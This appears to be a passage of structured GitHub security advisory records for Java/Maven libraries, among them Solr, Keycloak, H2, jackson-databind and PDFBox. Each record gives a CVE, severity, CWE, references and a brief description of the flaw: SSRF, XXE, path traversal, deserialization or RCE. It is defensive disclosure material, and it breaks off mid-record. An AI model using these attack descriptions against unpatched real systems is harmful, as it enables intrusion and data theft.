Maven
GHSA-h3wv-47xm-4mg6
Moderate severity vulnerability that affects com.kitfox.svg:svg-salamander
The SVG Salamander (aka svgSalamander) library, when used in a web application, allows remote attackers to conduct server-side request forgery (SSRF) attacks via an xlink:href attribute in an SVG file.
{'CVE-2017-5617'}
2022-03-03T05:12:33.300178Z
2018-10-19T16:51:25Z
HIGH
null
{'CWE-918'}
{'https://github.com/blackears/svgSalamander/issues/11', 'http://www.debian.org/security/2017/dsa-3781', 'http://www.openwall.com/lists/oss-security/2017/01/27/3', 'https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/3V7RIIO3HO4RNDBN2PARLIDAL3RPV2OX/', 'https://security.gentoo.org/glsa/202003-11', 'http://www.openwall.com/lists/oss-security/2017/01/29/2', 'https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/UPUOI6NCEB6H6YHKN7M4V3CAQD63NXAU/', 'http://www.securityfocus.com/bid/95871', 'https://nvd.nist.gov/vuln/detail/CVE-2017-5617', 'https://github.com/blackears/svgSalamander', 'https://github.com/advisories/GHSA-h3wv-47xm-4mg6'}
null
Maven
GHSA-62hc-f8qj-5xc3
Path traversal in Phoenix AutoTest Plugin
Jenkins Pipeline: Phoenix AutoTest Plugin 1.3 and earlier allows attackers with Item/Configure permission to upload arbitrary files from the Jenkins controller via FTP to an attacker-specified FTP server.
{'CVE-2022-28157'}
2022-04-05T20:05:40.868802Z
2022-03-30T00:00:22Z
MODERATE
null
{'CWE-22'}
{'https://nvd.nist.gov/vuln/detail/CVE-2022-28157', 'https://www.jenkins.io/security/advisory/2022-03-29/#SECURITY-2684', 'http://www.openwall.com/lists/oss-security/2022/03/29/1', 'https://github.com/jenkinsci/phoenix-autotest-plugin'}
null
Maven
GHSA-36hf-6hp2-9g4c
Local file inclusion allows unauthorized access to internal resources in Alkacon OpenCms
In Alkacon OpenCms 10.5.4 and 10.5.5, there are multiple resources vulnerable to Local File Inclusion that allow an attacker to access server resources: clearhistory.jsp, convertxml.jsp, group_new.jsp, loginmessage.jsp, xmlcontentrepair.jsp, and /system/workplace/admin/history/settings/index.jsp.
{'CVE-2019-13237'}
2022-04-19T20:15:09.918154Z
2019-11-12T22:58:14Z
MODERATE
null
{'CWE-200', 'CWE-22'}
{'https://github.com/alkacon/opencms-core', 'http://packetstormsecurity.com/files/154281/Alkacon-OpenCMS-10.5.x-Local-File-Inclusion.html', 'https://github.com/alkacon/opencms-core/commits/branch_10_5_x', 'https://aetsu.github.io/OpenCms', 'https://nvd.nist.gov/vuln/detail/CVE-2019-13237'}
null
Maven
GHSA-3gg7-9q2x-79fc
Improper Restriction of Rendered UI Layers or Frames in Keycloak
A vulnerability was found in all versions of Keycloak where, the pages on the Admin Console area of the application are completely missing general HTTP security headers in HTTP-responses. This does not directly lead to a security issue, yet it might aid attackers in their efforts to exploit other problems. The flaws unnecessarily make the servers more prone to Clickjacking, channel downgrade attacks and other similar client-based attack vectors.
{'CVE-2020-1728'}
2022-03-03T05:14:13.205229Z
2020-04-15T21:09:40Z
MODERATE
null
{'CWE-1021'}
{'https://bugzilla.redhat.com/show_bug.cgi?id=CVE-2020-1728', 'https://issues.redhat.com/browse/KEYCLOAK-12264', 'https://nvd.nist.gov/vuln/detail/CVE-2020-1728'}
null
Maven
GHSA-2h3j-m7gr-25xj
Excessive Iteration Denial of Service in Apache PDFBox
A carefully crafted PDF file can trigger an infinite loop while loading the file. This issue affects Apache PDFBox version 2.0.22 and prior 2.0.x versions.
{'CVE-2021-27807'}
2022-04-22T18:30:12.280832Z
2021-06-16T17:56:46Z
MODERATE
null
{'CWE-834'}
{'https://lists.apache.org/thread.html/r043edc5dcf9199f7f882ed7906b41cb816753766e88b8792dbf319a9@%3Cannounce.apache.org%3E', 'https://lists.apache.org/thread.html/rc69140d894c6a9c67a8097a25656cce59b46a5620c354ceba10543c3@%3Cnotifications.ofbiz.apache.org%3E', 'https://svn.apache.org/viewvc?view=revision&revision=1886911', 'https://github.com/apache/pdfbox', 'https://lists.apache.org/thread.html/r4717f902f8bc36d47b3fa978552a25e4ed3ddc2fffb52b94fbc4ab36@%3Cusers.pdfbox.apache.org%3E', 'https://lists.apache.org/thread.html/r5c8e2125d18af184c80f7a986fbe47eaf0d30457cd450133adc235ac@%3Ccommits.ofbiz.apache.org%3E', 'https://nvd.nist.gov/vuln/detail/CVE-2021-27807', 'https://lists.apache.org/thread.html/r9ffe179385637b0b5cbdabd0246118005b4b8232909d2d14cd68ccd3@%3Ccommits.ofbiz.apache.org%3E', 'https://www.oracle.com//security-alerts/cpujul2021.html', 'https://lists.apache.org/thread.html/r6e067a6d83ccb6892d0ff867bd216704f21fb0b6a854dea34be04f12@%3Cnotifications.ofbiz.apache.org%3E', 'https://lists.apache.org/thread.html/r4cbc3f6981cd0a1a482531df9d44e4c42a7f63342a7ba78b7bff8a1b@%3Cnotifications.james.apache.org%3E', 'https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/6PT72QOFDXLJ7PLTN66EMG5EHPTE7TFZ/', 'https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/6KDA2U4KL2N3XT3PM4ZJEBBA6JJIH2G4/', 'https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/2AVLKAHFMPH72TTP25INPZPGX5FODK3H/', 'https://lists.apache.org/thread.html/raa35746227f3f8d50fff1db9899524423a718f6f35cd39bd4769fa6c@%3Cnotifications.ofbiz.apache.org%3E', 'http://www.openwall.com/lists/oss-security/2021/03/19/9', 'https://lists.apache.org/thread.html/r1d268642f8b52456ee8f876b888b8ed7a9e9568c7770789f3ded7f9e@%3Ccommits.ofbiz.apache.org%3E', 'https://lists.apache.org/thread.html/re1e35881482e07dc2be6058d9b44483457f36133cac67956686ad9b9@%3Cnotifications.ofbiz.apache.org%3E', 'https://www.oracle.com/security-alerts/cpuapr2022.html', 'https://lists.apache.org/thread.html/r1218e60c32829f76943ecaca79237120c2ec1ab266459d711a578b50@%3Cdev.pdfbox.apache.org%3E', 'https://lists.apache.org/thread.html/r7ee634c21816c69ce829d0c41f35afa2a53a99bdd3c7cce8644fdc0e@%3Cnotifications.ofbiz.apache.org%3E', 'https://lists.apache.org/thread.html/r818058ff1e4b9f6bef4e5a2e74faff38cb3d3885c1e2db398bc55cfb%40%3Cusers.pdfbox.apache.org%3E', 'https://lists.apache.org/thread.html/r818058ff1e4b9f6bef4e5a2e74faff38cb3d3885c1e2db398bc55cfb@%3Cusers.pdfbox.apache.org%3E', 'https://issues.apache.org/jira/browse/PDFBOX-4892', 'https://lists.apache.org/thread.html/r54594251369e14c185da9662a5340a52afbbdf75d61c9c3a69c8f2e8@%3Cdev.pdfbox.apache.org%3E', 'https://github.com/apache/pdfbox/commit/5c5a837140fbb4ef78bb5ef9f29ad537c872c83e', 'https://www.oracle.com/security-alerts/cpuoct2021.html'}
null
Maven
GHSA-j346-h5wc-rw2m
Incorrect Authorization in Apache Solr
In Apache Solr, the cluster can be partitioned into multiple collections and only a subset of nodes actually host any given collection. However, if a node receives a request for a collection it does not host, it proxies the request to a relevant node and serves the request. Solr bypasses all authorization settings for such requests. This affects all Solr versions prior to 7.7 that use the default authorization mechanism of Solr (RuleBasedAuthorizationPlugin).
{'CVE-2018-11802'}
2022-03-03T05:13:20.778351Z
2022-02-09T23:19:26Z
MODERATE
null
{'CWE-863'}
{'https://nvd.nist.gov/vuln/detail/CVE-2018-11802', 'https://www.openwall.com/lists/oss-security/2019/04/24/1'}
null
Maven
GHSA-hr32-mgpm-qf2f
Generation of Error Message Containing Sensitive Information in RESTEasy client
A flaw was found in RESTEasy client in all versions of RESTEasy up to 4.5.6.Final. It may allow client users to obtain the server's potentially sensitive information when the server got WebApplicationException from the RESTEasy client call. The highest threat from this vulnerability is to data confidentiality.
{'CVE-2020-25633'}
2022-03-11T20:31:57.846588Z
2021-06-03T23:41:34Z
MODERATE
null
{'CWE-209'}
{'https://issues.redhat.com/browse/RESTEASY-2820', 'https://bugzilla.redhat.com/show_bug.cgi?id=CVE-2020-25633', 'https://nvd.nist.gov/vuln/detail/CVE-2020-25633', 'https://github.com/resteasy/Resteasy/pull/2665/commits/13c808b5967242eec1e877edbc0014a84dcd6eb0'}
null
Maven
GHSA-wg5w-vv93-3f7w
Moderate severity vulnerability that affects org.apache.oozie:oozie-core
Vulnerability allows a user of Apache Oozie 3.1.3-incubating to 5.0.0 to impersonate other users. The malicious user can construct an XML that results workflows running in other user's name.
{'CVE-2018-11799'}
2022-03-03T05:14:20.755734Z
2018-12-20T22:01:18Z
MODERATE
null
{'CWE-20'}
{'https://lists.apache.org/thread.html/347e7a8cb86014b7ca37e49eb00b8d088203bdc0bcfb4799f8e5955a@%3Cuser.oozie.apache.org%3E', 'https://github.com/advisories/GHSA-wg5w-vv93-3f7w', 'https://nvd.nist.gov/vuln/detail/CVE-2018-11799', 'http://www.securityfocus.com/bid/106266'}
null
Maven
GHSA-h592-38cm-4ggp
High severity vulnerability that affects com.fasterxml.jackson.core:jackson-databind
A deserialization flaw was discovered in the jackson-databind in versions before 2.8.10 and 2.9.1, which could allow an unauthenticated user to perform code execution by sending the maliciously crafted input to the readValue method of the ObjectMapper. This issue extends the previous flaw CVE-2017-7525 by blacklisting more classes that could be used maliciously.
{'CVE-2017-15095'}
2022-03-03T05:13:37.140143Z
2018-10-18T17:42:34Z
CRITICAL
null
{'CWE-502', 'CWE-184'}
{'https://access.redhat.com/errata/RHSA-2018:0576', 'https://access.redhat.com/errata/RHSA-2018:0480', 'https://access.redhat.com/errata/RHSA-2019:3892', 'https://access.redhat.com/errata/RHSA-2018:1448', 'http://www.oracle.com/technetwork/security-advisory/cpuoct2018-4428296.html', 'https://access.redhat.com/errata/RHSA-2018:2927', 'https://access.redhat.com/errata/RHSA-2018:0481', 'https://security.netapp.com/advisory/ntap-20171214-0003/', 'https://access.redhat.com/errata/RHSA-2018:0342', 'https://nvd.nist.gov/vuln/detail/CVE-2017-15095', 'https://access.redhat.com/errata/RHSA-2018:0479', 'https://access.redhat.com/errata/RHSA-2018:1449', 'https://access.redhat.com/errata/RHSA-2019:3149', 'http://www.oracle.com/technetwork/security-advisory/cpuapr2018-3678067.html', 'https://lists.debian.org/debian-lts-announce/2020/01/msg00037.html', 'https://access.redhat.com/errata/RHSA-2018:1451', 'https://www.oracle.com/security-alerts/cpuoct2020.html', 'https://github.com/advisories/GHSA-h592-38cm-4ggp', 'https://access.redhat.com/errata/RHSA-2018:1447', 'http://www.securityfocus.com/bid/103880', 'https://www.debian.org/security/2017/dsa-4037', 'https://www.oracle.com/technetwork/security-advisory/cpujul2019-5072835.html', 'https://github.com/FasterXML/jackson-databind/issues/1680', 'https://www.oracle.com/technetwork/security-advisory/cpujan2019-5072801.html', 'http://www.oracle.com/technetwork/security-advisory/cpujul2018-4258247.html', 'http://www.securitytracker.com/id/1039769', 'https://access.redhat.com/errata/RHSA-2017:3190', 'https://access.redhat.com/errata/RHSA-2019:2858', 'https://access.redhat.com/errata/RHSA-2018:1450', 'https://access.redhat.com/errata/RHSA-2018:0577', 'https://access.redhat.com/errata/RHSA-2017:3189', 'https://lists.apache.org/thread.html/f095a791bda6c0595f691eddd0febb2d396987eec5cbd29120d8c629@%3Csolr-user.lucene.apache.org%3E', 'https://github.com/FasterXML/jackson-databind/issues/1737', 'https://access.redhat.com/errata/RHSA-2018:0478'}
null
Maven
GHSA-3v44-382q-55f4
Moderate severity vulnerability that affects org.apache.hadoop:hadoop-main
Vulnerability in Apache Hadoop 0.23.x, 2.x before 2.7.5, 2.8.x before 2.8.3, and 3.0.0-alpha through 3.0.0-beta1 allows a cluster user to expose private files owned by the user running the MapReduce job history server process. The malicious user can construct a configuration file containing XML directives that reference sensitive files on the MapReduce job history server host.
{'CVE-2017-15713'}
2022-03-03T05:11:14.373729Z
2018-12-21T17:50:13Z
MODERATE
null
{'CWE-200'}
{'https://github.com/advisories/GHSA-3v44-382q-55f4', 'https://lists.apache.org/thread.html/a790a251ace7213bde9f69777dedb453b1a01a6d18289c14a61d4f91@%3Cgeneral.hadoop.apache.org%3E', 'https://nvd.nist.gov/vuln/detail/CVE-2017-15713'}
null
Maven
GHSA-mh83-jcw5-rjh8
XML External Entity Reference in edu.stanford.nlp:stanford-corenlp
The TransformXML() function makes use of SAXParser generated from a SAXParserFactory with no FEATURE_SECURE_PROCESSING set, allowing for XXE attacks.
{'CVE-2022-0198'}
2022-03-03T05:13:04.921797Z
2022-01-14T21:07:23Z
MODERATE
null
{'CWE-611'}
{'https://github.com/stanfordnlp/corenlp/commit/1f52136321cfca68b991bd7870563d06cf96624d', 'https://nvd.nist.gov/vuln/detail/CVE-2022-0198', 'https://github.com/stanfordnlp/corenlp/', 'https://huntr.dev/bounties/3d7e70fe-dddd-4b79-af62-8e058c4d5763'}
null
Maven
GHSA-9953-fmrw-v4vm
Cross-site Scripting in Apache JSPWiki
A carefully crafted user preferences for submission could trigger an XSS vulnerability on Apache JSPWiki, related to the user preferences screen, which could allow the attacker to execute javascript in the victim's browser and get some sensitive information about the victim. Apache JSPWiki users should upgrade to 2.11.2 or later.
{'CVE-2022-24948'}
2022-03-07T20:47:41.730975Z
2022-02-26T00:00:44Z
MODERATE
null
{'CWE-79'}
{'https://lists.apache.org/thread/86p0yzopc4mw2h5bkwpt927b2c8tfq3b', 'http://www.openwall.com/lists/oss-security/2022/02/25/2', 'https://nvd.nist.gov/vuln/detail/CVE-2022-24948'}
null
Maven
GHSA-66gw-ch5v-74v8
Cross-site scripting (XSS) in Apache ActiveMQ
An instance of a cross-site scripting vulnerability was identified to be present in the web based administration console on the message.jsp page of Apache ActiveMQ versions 5.15.12 through 5.16.0.
{'CVE-2020-13947'}
2022-03-03T05:13:21.646499Z
2022-02-09T22:01:32Z
MODERATE
null
{'CWE-79'}
{'https://lists.apache.org/thread.html/r021c490028f61c8b6f7e38efb98e61693b0cbb6b99b02238c6fc7d66@%3Ccommits.activemq.apache.org%3E', 'http://activemq.apache.org/security-advisories.data/CVE-2020-13947-announcement.txt', 'https://lists.apache.org/thread.html/ra66791f1f2b59fa651a81cec5202acdfbf34c2154fc0ff200301cc1c@%3Cusers.activemq.apache.org%3E', 'https://lists.apache.org/thread.html/ra66791f1f2b59fa651a81cec5202acdfbf34c2154fc0ff200301cc1c@%3Cdev.activemq.apache.org%3E', 'https://www.oracle.com/security-alerts/cpuoct2021.html', 'https://www.oracle.com/security-alerts/cpuApr2021.html', 'https://nvd.nist.gov/vuln/detail/CVE-2020-13947'}
null
Maven
GHSA-2457-2263-mm9f
Memory leak in micronaut-core
### Impact Sending an invalid Content Type header leads to memory leak in `DefaultArgumentConversionContext` as this type is erroneously used in static state. ### Patches The problem is patched in Micronaut 3.2.7 and above. ### Workarounds The default content type binder can be replaced in an existing Micronaut application to mitigate the issue: ```java package example; import java.util.List; import io.micronaut.context.annotation.Replaces; import io.micronaut.core.convert.ConversionService; import io.micronaut.http.MediaType; import io.micronaut.http.bind.DefaultRequestBinderRegistry; import io.micronaut.http.bind.binders.RequestArgumentBinder; import jakarta.inject.Singleton; @Singleton @Replaces(DefaultRequestBinderRegistry.class) class FixedRequestBinderRegistry extends DefaultRequestBinderRegistry { public FixedRequestBinderRegistry(ConversionService conversionService, List<RequestArgumentBinder> binders) { super(conversionService, binders); } @Override protected void registerDefaultConverters(ConversionService<?> conversionService) { super.registerDefaultConverters(conversionService); conversionService.addConverter(CharSequence.class, MediaType.class, charSequence -> { try { return MediaType.of(charSequence); } catch (IllegalArgumentException e) { return null; } }); } } ``` ### References Commit that introduced the vulnerability https://github.com/micronaut-projects/micronaut-core/commit/b8ec32c311689667c69ae7d9f9c3b3a8abc96fe3 ### For more information If you have any questions or comments about this advisory: * Open an issue in [Micronaut Core](https://github.com/micronaut-projects/micronaut-core/issues) * Email us at [info@micronaut.io](mailto:info@micronaut.io)
{'CVE-2022-21700'}
2022-03-03T05:11:18.519092Z
2022-01-21T23:19:36Z
MODERATE
null
{'CWE-400'}
{'https://nvd.nist.gov/vuln/detail/CVE-2022-21700', 'https://github.com/micronaut-projects/micronaut-core/security/advisories/GHSA-2457-2263-mm9f', 'https://github.com/micronaut-projects/micronaut-core/', 'https://github.com/micronaut-projects/micronaut-core/commit/b8ec32c311689667c69ae7d9f9c3b3a8abc96fe3'}
null
Maven
GHSA-2mq8-99q7-55wx
Code injection in keycloak
A flaw was found in keycloak. The new account console in keycloak can allow malicious code to be executed using the referrer URL. The highest threat from this vulnerability is to data confidentiality and integrity as well as system availability.
{'CVE-2021-20222'}
2022-03-03T05:12:40.262840Z
2021-05-13T22:29:51Z
HIGH
null
{'CWE-20'}
{'https://bugzilla.redhat.com/show_bug.cgi?id=1924606', 'https://nvd.nist.gov/vuln/detail/CVE-2021-20222', 'https://github.com/keycloak/keycloak/commit/3b80eee5bfdf2b80c47465c0f2eaf70074808741', 'https://access.redhat.com/security/cve/cve-2021-20222'}
null
Maven
GHSA-m4h3-7mc2-v295
An issue in Atomix v3.1.5 allows a malicious Atomix node to remove states of ONOS storage via abuse of primitive operations.
An issue in Atomix v3.1.5 allows a malicious Atomix node to remove states of ONOS storage via abuse of primitive operations.
{'CVE-2020-35214'}
2022-03-03T05:13:03.318122Z
2021-12-17T20:41:21Z
HIGH
null
null
{'https://docs.google.com/presentation/d/1wJi4QJko5ZCdADuzmAG9ed-nQLyJVkLBJf6cylAL71A/edit?usp=sharing', 'https://nvd.nist.gov/vuln/detail/CVE-2020-35214', 'https://github.com/atomix/atomix'}
null
Maven
GHSA-387v-84cv-9qmc
Moderate severity vulnerability that affects org.apache.solr:solr-core
When using the Index Replication feature, Apache Solr nodes can pull index files from a master/leader node using an HTTP API which accepts a file name. However, Solr before 5.5.4 and 6.x before 6.4.1 did not validate the file name, hence it was possible to craft a special request involving path traversal, leaving any file readable to the Solr server process exposed. Solr servers protected and restricted by firewall rules and/or authentication would not be at risk since only trusted clients and users would gain direct HTTP access.
{'CVE-2017-3163'}
2022-03-03T05:13:43.661227Z
2018-10-18T16:40:43Z
HIGH
null
{'CWE-22'}
{'https://access.redhat.com/errata/RHSA-2018:1447', 'https://access.redhat.com/errata/RHSA-2018:1449', 'https://access.redhat.com/errata/RHSA-2018:1450', 'https://github.com/advisories/GHSA-387v-84cv-9qmc', 'https://access.redhat.com/errata/RHSA-2018:1448', 'https://lists.apache.org/thread.html/a6a33a186f293f9f9aecf3bd39c76252bfc49a79de4321dd2a53b488@%3Csolr-user.lucene.apache.org%3E', 'https://access.redhat.com/errata/RHSA-2018:1451', 'https://www.debian.org/security/2018/dsa-4124', 'https://nvd.nist.gov/vuln/detail/CVE-2017-3163'}
null
Maven
GHSA-c7f6-4vx5-4263
Unrestricted Upload of File with Dangerous Type in Liferay Portal and Liferay DXP
Liferay Portal before 7.3.3, and Liferay DXP 7.1 before fix pack 18 and 7.2 before fix pack 6, does not restrict the size of a multipart/form-data POST action, which allows remote authenticated users to conduct denial-of-service attacks by uploading large files.
{'CVE-2020-15839'}
2022-03-03T05:13:24.502350Z
2022-02-10T20:46:21Z
MODERATE
null
{'CWE-434'}
{'https://portal.liferay.dev/learn/security/known-vulnerabilities/-/asset_publisher/HbL5mxmVrnXW/content/id/119784928', 'https://portal.liferay.dev/learn/security/known-vulnerabilities', 'https://issues.liferay.com/browse/LPE-17029', 'https://nvd.nist.gov/vuln/detail/CVE-2020-15839', 'https://issues.liferay.com/browse/LPE-17055'}
null
Maven
GHSA-v7wg-cpwc-24m4
Unchecked Class Instantiation when providing Plugin Classes
pgjdbc instantiates plugin instances based on class names provided via `authenticationPluginClassName`, `sslhostnameverifier`, `socketFactory`, `sslfactory`, `sslpasswordcallback` connection properties. However, the driver did not verify if the class implements the expected interface before instantiating the class. The first impacted version is REL9.4.1208 (it introduced `socketFactory` connection property).
{'CVE-2022-21724'}
2022-04-17T16:46:56.844044Z
2022-02-02T00:04:20Z
HIGH
null
{'CWE-668', 'CWE-74', 'CWE-665'}
{'https://security.netapp.com/advisory/ntap-20220311-0005/', 'https://github.com/pgjdbc/pgjdbc', 'https://nvd.nist.gov/vuln/detail/CVE-2022-21724', 'https://github.com/pgjdbc/pgjdbc/commit/f4d0ed69c0b3aae8531d83d6af4c57f22312c813', 'https://github.com/pgjdbc/pgjdbc/security/advisories/GHSA-v7wg-cpwc-24m4', 'https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/BVEO7BEFXPBVHSPYL3YKQWZI6DYXQLFS/'}
null
Maven
GHSA-crh4-294p-vcfq
Regular expression denial of service (ReDoS) in EmailField component in Vaadin 14 and 15-17
Unsafe validation RegEx in `EmailField` component in `com.vaadin:vaadin-text-field-flow` versions 2.0.4 through 2.3.2 (Vaadin 14.0.6 through 14.4.3), and 3.0.0 through 4.0.2 (Vaadin 15.0.0 through 17.0.10) allows attackers to cause uncontrolled resource consumption by submitting malicious email addresses. - https://vaadin.com/security/cve-2021-31405
null
2022-03-03T05:14:10.356842Z
2021-04-19T14:53:20Z
HIGH
null
{'CWE-400'}
{'https://github.com/vaadin/flow-components/security/advisories/GHSA-crh4-294p-vcfq', 'https://vaadin.com/security/cve-2021-31405', 'https://github.com/vaadin/flow-components'}
null
Maven
GHSA-qh3m-qw6v-qvhg
Moderate severity vulnerability that affects io.vertx:vertx-core
In version from 3.5.Beta1 to 3.5.3 of Eclipse Vert.x, the OpenAPI XML type validator creates XML parsers without taking appropriate defense against XML attacks. This mechanism is exclusively when the developer uses the Eclipse Vert.x OpenAPI XML type validator to validate a provided schema.
{'CVE-2018-12544'}
2022-03-03T05:13:26.091151Z
2018-10-17T16:20:32Z
MODERATE
null
{'CWE-611'}
{'https://github.com/advisories/GHSA-qh3m-qw6v-qvhg', 'https://github.com/vert-x3/vertx-web/issues/1021', 'https://bugs.eclipse.org/bugs/show_bug.cgi?id=539568', 'https://access.redhat.com/errata/RHSA-2018:2946', 'https://lists.apache.org/thread.html/rd0e44e8ef71eeaaa3cf3d1b8b41eb25894372e2995ec908ce7624d26@%3Ccommits.pulsar.apache.org%3E', 'https://nvd.nist.gov/vuln/detail/CVE-2018-12544'}
null
Maven
GHSA-96jq-75wh-2658
Moderate severity vulnerability that affects apache axis
Apache Axis 1.x up to and including 1.4 is vulnerable to a cross-site scripting (XSS) attack in the default servlet/services.
{'CVE-2018-8032'}
2022-03-03T05:13:52.365977Z
2018-10-16T20:51:15Z
MODERATE
null
{'CWE-79'}
{'https://lists.debian.org/debian-lts-announce/2021/11/msg00015.html', 'https://www.oracle.com/security-alerts/cpuapr2020.html', 'https://www.oracle.com/security-alerts/cpujul2020.html', 'https://www.oracle.com/security-alerts/cpujan2021.html', 'http://mail-archives.apache.org/mod_mbox/axis-java-dev/201807.mbox/%3CJIRA.13170716.1531060536000.93536.1531060560060@Atlassian.JIRA%3E', 'https://lists.apache.org/thread.html/d06ed5e4eeb77d00e8d594ec01ee8ee1cba173a01ac4b18f1579d041@%3Cjava-dev.axis.apache.org%3E', 'https://www.oracle.com/security-alerts/cpuoct2021.html', 'https://github.com/advisories/GHSA-96jq-75wh-2658', 'https://lists.apache.org/thread.html/3b89bc9e9d055db7eba8835ff6501f3f5db99d2a0928ec0be9b1d17b@%3Cjava-dev.axis.apache.org%3E', 'https://www.oracle.com/security-alerts/cpujan2020.html', 'https://nvd.nist.gov/vuln/detail/CVE-2018-8032', 'https://issues.apache.org/jira/browse/AXIS-2924', 'https://www.oracle.com/security-alerts/cpuApr2021.html', 'https://www.oracle.com/technetwork/security-advisory/cpuoct2019-5072832.html'}
null
Maven
GHSA-jjhw-5mxp-2g2q
Cross-site Scripting in OpenNMS Horizon
In OpenNMS Horizon, versions opennms-1-0-stable through opennms-27.1.1; OpenNMS Meridian, versions meridian-foundation-2015.1.0-1 through meridian-foundation-2019.1.18-1; meridian-foundation-2020.1.0-1 through meridian-foundation-2020.1.6-1 are vulnerable to Stored Cross-Site Scripting, since the function `validateFormInput()` performs improper validation checks on the input sent to the `groupName` and `groupComment` parameters. Due to this flaw, an authenticated attacker could inject arbitrary script and trick other admin users into downloading malicious files which can cause severe damage to the organization using opennms.
{'CVE-2021-25933'}
2021-05-28T22:27:50Z
2021-05-25T18:47:01Z
MODERATE
null
{'CWE-79'}
{'https://github.com/OpenNMS/opennms/commit/8a97e6869d6e49da18b208c837438ace80049c01,', 'https://www.whitesourcesoftware.com/vulnerability-database/CVE-2021-25933', 'https://github.com/OpenNMS/opennms/commit/eb08b5ed4c5548f3e941a1f0d0363ae4439fa98c', 'https://nvd.nist.gov/vuln/detail/CVE-2021-25933', 'https://github.com/OpenNMS/opennms/commit/f3ebfa3da5352b4d57f238b54c6db315ad99f10e'}
null
Maven
GHSA-7m27-3587-83xf
Privilege Defined With Unsafe Actions in Keycloak
A flaw was found in the Keycloak admin console, where the realm management interface permits a script to be set via the policy. This flaw allows an attacker with authenticated user and realm management permissions to configure a malicious script to trigger and execute arbitrary code with the permissions of the application user.
{'CVE-2019-10170'}
2022-03-03T05:12:41.091023Z
2021-10-21T17:46:27Z
HIGH
null
{'CWE-267'}
{'https://bugzilla.redhat.com/show_bug.cgi?id=CVE-2019-10170', 'https://nvd.nist.gov/vuln/detail/CVE-2019-10170', 'https://github.com/keycloak/keycloak'}
null
Maven
GHSA-ffjh-fjgg-mfpq
Moderate severity vulnerability that affects org.apache.ranger:ranger
In environments that use external location for hive tables, Hive Authorizer in Apache Ranger before 0.7.1 should be checking RWX permission for create table.
{'CVE-2017-7677'}
2022-03-03T05:13:05.939457Z
2018-10-17T17:22:49Z
MODERATE
null
{'CWE-862'}
{'http://www.securityfocus.com/bid/98961', 'https://cwiki.apache.org/confluence/display/RANGER/Vulnerabilities+found+in+Ranger', 'https://nvd.nist.gov/vuln/detail/CVE-2017-7677', 'https://github.com/advisories/GHSA-ffjh-fjgg-mfpq'}
null
Maven
GHSA-8222-6fc8-mhvf
Vulnerability that affects org.springframework.ws:spring-ws and org.springframework.ws:spring-xml
Spring Web Services, versions 2.4.3, 3.0.4, and older unsupported versions of all three projects, were susceptible to XML External Entity Injection (XXE) when receiving XML data from untrusted sources.
{'CVE-2019-3773'}
2022-03-03T05:14:13.961852Z
2019-01-25T16:18:52Z
CRITICAL
null
{'CWE-611'}
{'https://www.oracle.com/security-alerts/cpujan2021.html', 'https://nvd.nist.gov/vuln/detail/CVE-2019-3773', 'https://github.com/advisories/GHSA-8222-6fc8-mhvf', 'https://pivotal.io/security/cve-2019-3773', 'https://www.oracle.com/security-alerts/cpuApr2021.html'}
null
Maven
GHSA-h376-j262-vhq6
RCE in H2 Console
### Impact H2 Console in versions since 1.1.100 (2008-10-14) to 2.0.204 (2021-12-21) inclusive allows loading of custom classes from remote servers through JNDI. H2 Console doesn't accept remote connections by default. If remote access was enabled explicitly and some protection method (such as security constraint) wasn't set, an intruder can load own custom class and execute its code in a process with H2 Console (H2 Server process or a web server with H2 Console servlet). It is also possible to load them by creation a linked table in these versions, but it requires `ADMIN` privileges and user with `ADMIN` privileges has full access to the Java process by design. These privileges should never be granted to untrusted users. ### Patches Since version 2.0.206 H2 Console and linked tables explicitly forbid attempts to specify LDAP URLs for JNDI. Only local data sources can be used. ### Workarounds H2 Console should never be available to untrusted users. `-webAllowOthers` is a dangerous setting that should be avoided. H2 Console Servlet deployed on a web server can be protected with a security constraint: https://h2database.com/html/tutorial.html#usingH2ConsoleServlet If `webAllowOthers` is specified, you need to uncomment and edit `<security-role>` and `<security-constraint>` as necessary. See documentation of your web server for more details. ### References This issue was found and privately reported to H2 team by [JFrog Security](https://www.jfrog.com/)'s vulnerability research team with detailed information.
{'CVE-2021-42392'}
2022-04-22T15:47:22.234362Z
2022-01-06T23:55:09Z
CRITICAL
null
{'CWE-502'}
{'https://github.com/h2database/h2database/releases/tag/version-2.0.206', 'https://jfrog.com/blog/the-jndi-strikes-back-unauthenticated-rce-in-h2-database-console/', 'https://lists.debian.org/debian-lts-announce/2022/02/msg00017.html', 'https://github.com/h2database/h2database/security/advisories/GHSA-h376-j262-vhq6', 'https://www.oracle.com/security-alerts/cpuapr2022.html', 'https://nvd.nist.gov/vuln/detail/CVE-2021-42392', 'https://security.netapp.com/advisory/ntap-20220119-0001/', 'https://github.com/h2database/h2database', 'https://www.debian.org/security/2022/dsa-5076'}
null
Maven
GHSA-7px3-6f6g-hxcj
Moderate severity vulnerability that affects org.apache.solr:solr-core
This vulnerability in Apache Solr 6.0.0 to 6.6.4 and 7.0.0 to 7.3.1 relates to an XML external entity expansion (XXE) in Solr config files (currency.xml, enumsConfig.xml referred from schema.xml, TIKA parsecontext config file). In addition, Xinclude functionality provided in these config files is also affected in a similar way. The vulnerability can be used as XXE using file/ftp/http protocols in order to read arbitrary local files from the Solr server or the internal network. The manipulated files can be uploaded as configsets using Solr's API, allowing to exploit that vulnerability.
{'CVE-2018-8026'}
2022-03-03T05:13:34.470396Z
2018-10-17T19:55:34Z
MODERATE
null
{'CWE-611'}
{'https://issues.apache.org/jira/browse/SOLR-12450', 'https://nvd.nist.gov/vuln/detail/CVE-2018-8026', 'http://www.securityfocus.com/bid/104690', 'https://security.netapp.com/advisory/ntap-20190307-0002/', 'https://github.com/advisories/GHSA-7px3-6f6g-hxcj', 'https://mail-archives.apache.org/mod_mbox/lucene-solr-user/201807.mbox/%3C0cdc01d413b7%24f97ba580%24ec72f080%24%40apache.org%3E'}
null
Maven
GHSA-p7jq-v8jp-j424
Timing side channel vulnerability in endpoint request handler in Vaadin 15-19
